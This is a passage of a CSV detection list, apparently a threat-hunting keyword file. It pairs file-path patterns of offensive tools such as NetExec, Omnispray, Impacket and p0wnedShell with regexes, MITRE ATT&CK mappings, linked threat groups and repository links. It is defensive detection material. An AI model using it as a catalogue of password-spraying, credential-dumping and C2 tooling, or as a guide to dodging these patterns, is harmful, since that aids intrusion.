"*\nxc.exe*",".{0,1000}\\nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17009"
"*\nxc\parsers\ip.py*",".{0,1000}\\nxc\\parsers\\ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17010"
"*\nxc\parsers\nmap.py*",".{0,1000}\\nxc\\parsers\\nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17011"
"*\o365_enum_activesync.py*",".{0,1000}\\o365_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17012"
"*\o365_enum_office.py*",".{0,1000}\\o365_enum_office\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17013"
"*\o365_enum_onedrive.py*",".{0,1000}\\o365_enum_onedrive\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17014"
"*\o365_spray_activesync.py*",".{0,1000}\\o365_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17015"
"*\o365_spray_adfs.py*",".{0,1000}\\o365_spray_adfs\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17016"
"*\o365_spray_msol.py*",".{0,1000}\\o365_spray_msol\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17017"
"*\o365spray.py*",".{0,1000}\\o365spray\.py.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","17018"
"*\Obfuscar.Console.exe*",".{0,1000}\\Obfuscar\.Console\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","17019"
"*\obfuscate_strings.py*",".{0,1000}\\obfuscate_strings\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","17020"
"*\Obfuscated_Command.txt*",".{0,1000}\\Obfuscated_Command\.txt.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","17022"
"*\Obfuscated-Code.py*",".{0,1000}\\Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","17023"
"*\ObfuscatedSharpCollection*",".{0,1000}\\ObfuscatedSharpCollection.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","17024"
"*\obfuscation.exe --help*",".{0,1000}\\obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17025"
"*\obfy-1.0.zip*",".{0,1000}\\obfy\-1\.0\.zip.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","0","N/A","N/A","N/A","7","678","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z","17026"
"*\oem\Desktop\backdoor*",".{0,1000}\\oem\\Desktop\\backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","17027"
"*\OffensiveCpp\",".{0,1000}\\OffensiveCpp\\","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","17028"
"*\OffensiveCpp-main*",".{0,1000}\\OffensiveCpp\-main.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","17029"
"*\OffensiveCSharp\*",".{0,1000}\\OffensiveCSharp\\.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","17030"
"*\OffensiveCSharp-master\*",".{0,1000}\\OffensiveCSharp\-master\\.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17031"
"*\Offensive-Netsh-Helper\*",".{0,1000}\\Offensive\-Netsh\-Helper\\.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","17032"
"*\Offensive-Netsh-Helper-master*",".{0,1000}\\Offensive\-Netsh\-Helper\-master.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","17033"
"*\OfficeInjector.exe*",".{0,1000}\\OfficeInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","17034"
"*\OfficePersistence.ps1*",".{0,1000}\\OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","17035"
"*\OfflineKeyloggerPipe*",".{0,1000}\\OfflineKeyloggerPipe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","named pipe","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","17036"
"*\oh365userfinder.py*",".{0,1000}\\oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","17039"
"*\omnispray.py*",".{0,1000}\\omnispray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17040"
"*\Omnispray-main*",".{0,1000}\\Omnispray\-main.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17041"
"*\onesixtyone.py*",".{0,1000}\\onesixtyone\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17042"
"*\online_brute.gz*",".{0,1000}\\online_brute\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","0","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","17043"
"*\openchromedumps.exe*",".{0,1000}\\openchromedumps\.exe.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17045"
"*\openChromeDumps.pdb*",".{0,1000}\\openChromeDumps\.pdb.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17046"
"*\OperaPassView.chm*",".{0,1000}\\OperaPassView\.chm.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17049"
"*\operapassview.zip",".{0,1000}\\operapassview\.zip","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17050"
"*\OperaPassView_lng.ini*",".{0,1000}\\OperaPassView_lng\.ini.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17051"
"*\oracle-patator.py*",".{0,1000}\\oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17053"
"*\oracle-scanner.py*",".{0,1000}\\oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17054"
"*\oracle-tnscmd.py*",".{0,1000}\\oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17055"
"*\OrionRAT.exe*",".{0,1000}\\OrionRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17056"
"*\orionserver.exe*",".{0,1000}\\orionserver\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17057"
"*\os\windows\pkg\evasion\evasion*",".{0,1000}\\os\\windows\\pkg\\evasion\\evasion.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","17058"
"*\oSpray.py*",".{0,1000}\\oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","17061"
"*\ouned_smbserver.py*",".{0,1000}\\ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","17062"
"*\out_pe.exe*",".{0,1000}\\out_pe\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","17063"
"*\OutFileCommand.cs",".{0,1000}\\OutFileCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","17064"
"*\Outflank-Recon-AD\*",".{0,1000}\\Outflank\-Recon\-AD\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17065"
"*\OutlookEmails.log*",".{0,1000}\\OutlookEmails\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17067"
"*\Out-Minidump.ps1*",".{0,1000}\\Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17068"
"*\Out-Minidump.ps1*",".{0,1000}\\Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","17069"
"*\owa_enum_activesync.py*",".{0,1000}\\owa_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17070"
"*\owa_spray_activesync.py*",".{0,1000}\\owa_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17071"
"*\owa-sprayed-creds.txt*",".{0,1000}\\owa\-sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","17072"
"*\owa-valid-users.txt*",".{0,1000}\\owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17073"
"*\owneredit.py*",".{0,1000}\\owneredit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17074"
"*\OxidResolver.exe*",".{0,1000}\\OxidResolver\.exe.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","17075"
"*\p0wnedAmsiBypass.*",".{0,1000}\\p0wnedAmsiBypass\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17076"
"*\p0wnedExecute.*",".{0,1000}\\p0wnedExecute\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17077"
"*\p0wnedInveigh.*",".{0,1000}\\p0wnedInveigh\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17078"
